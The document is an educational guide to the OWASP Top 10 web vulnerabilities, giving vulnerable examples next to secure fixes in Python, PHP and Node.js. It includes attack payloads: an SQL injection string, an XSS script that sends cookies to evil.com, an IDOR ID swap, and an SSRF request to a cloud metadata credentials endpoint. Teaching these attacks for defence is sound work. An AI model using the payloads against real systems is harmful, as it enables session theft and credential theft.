OWASP Top 10 (2023)
Introduction to Web Security
Web applications are the primary attack surface for modern organizations. With 43% of data breaches involving web applications, understanding and mitigating web vulnerabilities is critical for any security program.
Key Statistics
- 95% of web applications have at least one vulnerability
- Average time to fix critical vulnerabilities: 205 days
- Web attacks increased 22% year-over-year
A01 Broken Access Control
Access control enforces policy such that users cannot act outside of their intended permissions. Failures typically lead to unauthorized information disclosure, modification, or destruction of data.
IDOR (Insecure Direct Object Reference)
Attacker modifies object references to access unauthorized data.
# Vulnerable endpoint - user can access any order
GET /api/orders/12345
# Attacker changes ID
GET /api/orders/12346 # Accesses another user's order!Prevention
# Python Flask - Secure implementation
@app.route('/api/orders/')
@login_required
def get_order(order_id):
order = Order.query.get_or_404(order_id)
# CRITICAL: Verify ownership
if order.user_id != current_user.id:
abort(403) # Forbidden
return jsonify(order.to_dict()) A02 Cryptographic Failures
Previously known as "Sensitive Data Exposure." This focuses on failures related to cryptography which often lead to sensitive data exposure.
Common Failures
- Transmitting data in cleartext (HTTP instead of HTTPS)
- Using deprecated cryptographic algorithms (MD5, SHA1, DES)
- Weak or default encryption keys
- Not validating SSL/TLS certificates
- Storing passwords with reversible encryption
Secure Password Storage
# Python - Use bcrypt or Argon2
import bcrypt
# Hashing password
hashed = bcrypt.hashpw(password.encode(), bcrypt.gensalt(rounds=12))
# Verification
if bcrypt.checkpw(provided_password.encode(), stored_hash):
# Password correctA03 Injection
Injection flaws occur when an attacker can send hostile data to an interpreter. SQL injection, NoSQL injection, OS command injection, and LDAP injection are common examples.
SQL Injection
# VULNERABLE - Direct string concatenation
query = f"SELECT * FROM users WHERE username = '{username}'"
# Attack payload
username = "admin' OR '1'='1' --"
# Results in: SELECT * FROM users WHERE username = 'admin' OR '1'='1' --'Prevention: Parameterized Queries
# Python - SQLAlchemy (ORM)
user = User.query.filter_by(username=username).first()
# Python - Raw SQL with parameters
cursor.execute("SELECT * FROM users WHERE username = %s", (username,))
# Node.js - Prepared statements
db.query('SELECT * FROM users WHERE username = ?', [username]);Cross-Site Scripting (XSS)
<!-- Vulnerable: Reflected XSS -->
<p>Search results for: <?php echo $_GET['query']; ?></p>
<!-- Attack -->
?query=<script>document.location='http://evil.com/steal?c='+document.cookie</script>Prevention
<!-- PHP - Escape output -->
<p>Search results for: <?php echo htmlspecialchars($_GET['query'], ENT_QUOTES, 'UTF-8'); ?></p>
<!-- React - Automatically escaped -->
<p>Search results for: {query}</p>
<!-- Content Security Policy header -->
Content-Security-Policy: default-src 'self'; script-src 'self'A04 Insecure Design
Focuses on risks related to design and architectural flaws. Cannot be fixed by perfect implementation alone—secure design patterns must be used from the start.
A05 Security Misconfiguration
Improperly configured permissions, default accounts, unnecessary features enabled, and missing security patches.
# Secure HTTP headers to set
Strict-Transport-Security: max-age=31536000; includeSubDomains
X-Content-Type-Options: nosniff
X-Frame-Options: DENY
Content-Security-Policy: default-src 'self'
X-XSS-Protection: 1; mode=blockA06 Vulnerable and Outdated Components
Using components with known vulnerabilities. Regular dependency scanning is essential.
# Check for vulnerabilities
npm audit
pip-audit
snyk test
trivy fs .A07 Identification and Authentication Failures
Weak password requirements, improper session management, credential stuffing vulnerabilities.
A08 Software and Data Integrity Failures
Code and infrastructure that does not protect against integrity violations. Includes insecure deserialization and CI/CD pipeline security.
A09 Security Logging and Monitoring Failures
Without proper logging and monitoring, breaches cannot be detected. Log authentication events, access control failures, and server-side input validation failures.
A10 Server-Side Request Forgery (SSRF)
SSRF occurs when a web application fetches a remote resource without validating the user-supplied URL.
# Attack: Access internal metadata service
POST /fetch-image
url=http://169.254.169.254/latest/meta-data/iam/security-credentials/
# Prevention: Whitelist allowed domains
ALLOWED_DOMAINS = ['cdn.example.com', 'images.example.com']
if urlparse(url).netloc not in ALLOWED_DOMAINS:
abort(403)Last updated: December 2024